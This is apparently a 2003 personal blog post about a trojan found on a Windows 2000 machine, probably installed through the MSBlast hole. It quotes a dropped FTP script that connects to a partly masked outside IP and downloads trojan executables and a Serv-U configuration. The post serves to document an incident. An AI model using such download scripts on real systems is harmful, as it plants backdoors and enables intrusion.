Thursday, August 14, 2003

My win2k computer didn't get msblast (just my officemate's win xp computer), but it got hacked with a trojan I hadn't seen before, using the same method, probably.
In \winnt\system32 I found "firedaemon.exe" and "winlog.exe" and a file called "a" with this code:

open 213.93.xx.x 4101
user get get
get winlog.exe
get servudaemon.ini
get firedaemon.exe
get cygwin1.dll
get win.bat

So, when people say Kiddie Porn: the virus did it I have some reason to believe it. My computer runs a lot faster now and there's more free space on the disk, though I haven't discovered if the hackers put anything onto it. Googling for "winlog firedaemon" turns up nothing relevant, although firedaemon is a good hacker's tool for running things in the background.

No comments: